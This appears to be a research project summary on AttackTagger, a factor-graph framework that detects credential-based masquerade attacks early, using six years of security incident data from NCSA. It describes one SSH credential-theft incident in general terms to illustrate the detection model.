Despite sophisticated monitoring tools for runtime detection of intruders and techniques designed to protect computing systems from a wide range of attacks, attackers continually penetrate even well-protected systems. Attack data from real, large-scale production environments (National Center for Supercomputing Applications (NCSA) at Illinois, in this work) are used as a basis for characterizing and modeling attacker behavior and for uncovering deficiencies of the monitoring infrastructure. Increased understanding of attacks arising from these analysis and modeling activities significantly contributes to improvements in secure systems analysis and design. The analyses uncover new and realistic attack scenarios that can guide the design of enhancements to improve system protection against malicious activities at every level. Understanding real attack patterns and classes through detailed forensics pinpoints the open holes in a network/system and characterizes attacker behavior. In-depth study of the data allows investigating actions and intentions of the attacker, and creates a foundation for the design of an automated tool to assist in data collection, analysis, and response. The size and variety of the data enable a flexible framework to be developed that can incorporate insights gained from attacks yet unseen.
This research produces sound methods for automated (semi-automated) analysis of large populations of data on security attacks and develops tools to facilitate the analysis and detection. The goals are to understand the attack patterns, establish comprehensive models to capture attacker behavior, and use the models to enable development of techniques for rapid detection of malicious tampering with the system.
Project Goals This project lays down the foundations for methods to: (i) characterize and model attacker behavior, (ii) uncover deficiencies of the security monitoring infrastructure and (iii) aid in the design of new techniques for security monitoring. The data on security incidents from a real large-scale production environment (at the National Center for Supercomputing Applications, NCSA, at Illinois) are used as a basis for the analysis. The investigations provide new and realistic attack scenarios and patterns for security researchers and the results can be used to guide the design of enhancements to improve system protection against malicious activities at every level of the system. By studying the data more intricately, we can investigate essentially every action and intention of the attacker and create a foundation for the design of an automated tool to assist in data collection, analysis, and response. The size and variety of the data allow us to develop a flexible framework and toolset with an ability to incorporate lessons and insights gained from new attacks that will surely happen. Approach Attackers often use stolen credential to enter a target system while disguised as a legitimate user, effectively bypassing conventional defense measures, e.g., network firewalls. Such masquerade attacks are frequently discovered in the final stage of delivering the attack payload, resulting in a leak of confidential data or interruption of critical system services. Our objective is to detect such masquerade attacks in their early stages, before the attackers execute their attack payloads, and to provide a supporting tool for security engineers to effectively prevent such attacks. In order to solve the challengers of detecting masquerade attacks, we propose AttackTagger, a software framework based on use of Factor Graphs (an abstract probabilistic graphical model) to represent functional relation between the observed evidence (the event sequence) and the hidden system/user states to detect compromised users. Figure 1 shows an example of a real multi-stage security incident and its representation using the factor graph abstraction. Events corresponding to an incident where an attacker penetrates the system using stolen credentials, are shown at the top of Figure 1. A user logs (from a remote host) into the target system using the secure shell (SSH); then, a source file (vm64.c) is downloaded from a server; finally, the SSH daemon (SSHd) is restarted. Post-incident analysis showed that the attacker downloaded, compiled, and executed a privilege escalation exploit on the target node. In order to harvest credentials of users logging to the compromised node, the attacker escalated to the root, and injected credential collecting code to the original SSHd, forcing it to restart. A generic process of labeling the state sequences (from extraction of events from the data logs to attack detection) using factor graph is depicted in Figure 2. In order to detect attackers at run-time, we convert raw logs to discrete events and label each event with a user state which represents user suspiciousness level (benign, suspicious, or malicious). For example, the event login (in Figure 1) is labeled as benign (based on our prior knowledge). A factor function (black squares in Figure 1) is a function that takes as inputs event labels and outputs a discrete value. The factor functions are defined manually based on analysis of data on past security incidents, knowledge of the target system, and experience of security experts. The compromised user is identified when the last label, in the sequence representing the evolution of the user states over time, indicates that the user state is malicious. Evaluation We apply this approach to detect masquerade attacks sufficiently before the system is misused. Using detailed information on security incidents occurred over a six-year period (2008-2013) at NCSA, we identify attack attributes such as: user profiles (e.g., user’s role or registered physical location), events (i.e., observations of user activities leading to a successful compromise), and measurements of the network and system (e.g., the number of alerts observed in the system). As an attack progresses, a hidden state variable (i.e., a user state) is associated with each observed event. We then use a Factor Graph model to define evolution of the attack, in which observed/hidden variables are linked by factor functions representing functional relations among the variables. AttackTagger automatically assesses whether the user account is compromised (i.e., the user state is malicious). Data on 24 real-world masquerade incidents are used to evaluate the proposed approach. AttackTagger detects 75% of attacks early (from minutes to tens of hours before attack payloads are executed) in real-time. When compared to rule-based and machine learning classification techniques, our method has a higher attack detection rate, a rapid response time, and a lower rate of false positives.